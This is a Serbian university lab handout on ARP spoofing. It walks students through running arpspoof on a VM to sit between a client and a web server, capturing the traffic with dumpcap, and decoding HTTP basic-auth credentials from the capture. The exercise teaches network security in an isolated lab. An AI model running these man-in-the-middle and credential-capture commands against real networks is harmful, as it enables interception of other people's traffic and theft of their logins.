

## Elektrotehnički fakultet u Beogradu Katedra za računarsku tehniku i informatiku

# Zaštita računarskih sistema i mreža

- Treća laboratorijska vežba -

### ARP spoofing.

Za vežbu ARP spoofing će se koristiti samo veze između tri virtuelne mašine preko interfejsa  $eth\theta$  na kojima su virtuelne mašine u istom mrežnom segmentu (mreža 192.168.x.0/24).

Uloge virtuelnih mašina će biti:

- VM1 napadnuti uređaj koji će dobijati lažne ARP odgovore kada želi da komunicira sa VM3,
- *VM2* napadač koji će *ARP spoofing* napadom naterati *VM1* da njegova komunikacija sa *VM3* prođe kroz *VM2*.
- *VM3* veb server na koji se povezuje *VM1*.

Programom *Putty* povezati se *SSH* protokolom na tri virtuelne mašine: jedna veza ka *VM1*, tri veze ka *VM2* i jedna veza ka *VM3*. Na svim uređajima komandom *ifconfig* pronaći i zabeležiti *MAC* adrese na interfejsima *eth0* sve tri virtuelne mašine.

#### FAZA 1 – Nema ARP spoofing napada.

- 1. Pomoću *WinSCP* se povezati na *VM3* (ista adresa i kredencijali kao i za *SSH* vezu) i postaviti fajl *SimpleAuthServer.py* u folder na putanji *home/student/Documents/web/*
- 2. Na VM3 podići prost web server sledećim komandama:

cd Documents/web

sudo python3 SimpleAuthServer.py 80 username:password (username i password su korisničko ime i lozinka koji se koriste na web serveru i mogu da se promene po želji).

3. Na VM2 u prozoru 1 instalirati potreban alat komandom

sudo apt install wireshark

a zatim pokrenuti snimanje paketa komandom:

sudo dumpcap -i eth0 -w /tmp/cap2.pcapng

- 4. Na VM1 se povezati pomoću *VNC*. Po povezivanju pokrenuti *Firefox web browser* i otići na adresu 192.168.**x**.3. U prozor upisati kredencijale.
- 5. Po završetku uspešne komunikacije sa web serverom prekinuti snimanje paketa na VM2 u prozoru 1 (*CTRL+C*) i prebaciti fajl sa snimljenim paketima na VM2 i dati privilegije za čitanje fajla sledećim komandama:

```
sudo mv /tmp/cap2.pcapng /home/student/Documents/
sudo chmod +rw cap2.pcapng
```

- 6. Pomoću *WinSCP* se povezati na VM2 (ista adresa i kredencijali kao i za *SSH* vezu) i preuzeti fajl *cap2.pcapng*.
- 7. U *Wireshark* alatu analizirati preuzeti fajl. Da li se u njemu pojavljuje komunikacija između VM1 i VM3? Zašto?
- 8. Ugasiti *WinSCP* sesiju da u kasnijim fazama rada ova komunikacija ne bi nepotrebno povećala količinu snimljenih paketa.

#### FAZA 2 -ARP spoofing.

1. Na VM2 u prozoru 1 proveriti da li VM2 vrši rutiranje paketa pomoću komande:

```
sysctl net.ipv4.ip forward
```

Ako je odgovor 0, onda pokrenuti rutiranje pomoću komande

```
sudo sysctl -w net.ipv4.ip forward=1
```

2. Na VM2 u prozoru 2 instalirati potreban alat komandom

```
sudo apt install dsniff
```

a zatim pokrenuti ARP spoofing sledećom komandom

```
sudo arpspoof -i eth0 -t 192.168.x.1 192.168.x.3
```

(komanda se pokreće na interfejsu eth0, meta napada je VM1, a podmeće se lažna adresa za VM3)

3. Na VM2 u prozoru 3 pokrenuti *ARP spoofing* u drugom smeru sledećom komandom sudo arpspoof -i eth0 -t 192.168.x.3 192.168.x.1

4. Na VM2 u prozoru 1 pokrenuti snimanje paketa komandom:

```
sudo dumpcap -i eth0 -w /tmp/cap2.pcapng
```

5. Na VM1 očistiti ARP ulaz za VM3 sledećom komandom sudo arp -d 192.168.x.3

6. Na VM1 pokrenuti snimanje paketa komandom:

```
sudo dumpcap -i eth0 -w /tmp/cap1.pcapng
```

- 7. Na VM1 se povezati pomoću *VNC*. Po povezivanju pokrenuti *Firefox web browser* i otići na adresu 192.168.**x**.3. U prozor upisati kredencijale.
- 8. Po završetku uspešne komunikacije sa web serverom prekinuti snimanje paketa na VM1 i VM2 u prozoru 1 (*CTRL+C*) i prebaciti fajl sa snimljenim paketima na VM1 i VM2 i dati privilegije za čitanje fajla sledećim komandama (prve dve komande u prozoru 1 mašine VM2, druge dve komande na mašini VM1):

```
sudo mv /tmp/cap2.pcapng /home/student/Documents/
sudo chmod +rw cap2.pcapng
sudo mv /tmp/cap1.pcapng /home/student/Documents/
sudo chmod +rw cap1.pcapng
```

- 9. Pomoću WinSCP se povezati na VM1 i VM2 (ista adresa i kredencijali kao i za *SSH* vezu) i preuzeti fajlove *cap1.pcapng* i *cap2.pcapng*.
- 10. U Wireshark alatu analizirati preuzete fajlove.
  - a. Da li se u fajlu *cap2.pcapng* pojavljuje komunikacija između VM1 i VM3?
  - b. Koje su *MAC* adrese u paketima koji su namenjeni za VM3? Zašto postoje po dva ista paketa između VM1 i VM3? Koje su MAC adrese na njima?
  - c. Da li se na VM2 vide ARP paketi kojima se VM1 vara tako što mu se podmeće lažna MAC adresa?
  - d. Da li se u paketima koji prolaze kroz VM2 vide kredencijali koji su korišćeni za logovanje na web server? (po potrebi koristiti alat za konverziju *base64* u tekst, npr. *web* alat *base64decode.com*)
  - e. Da li su u pitanju isti paketi kao oni koji su zabeleženi na VM1?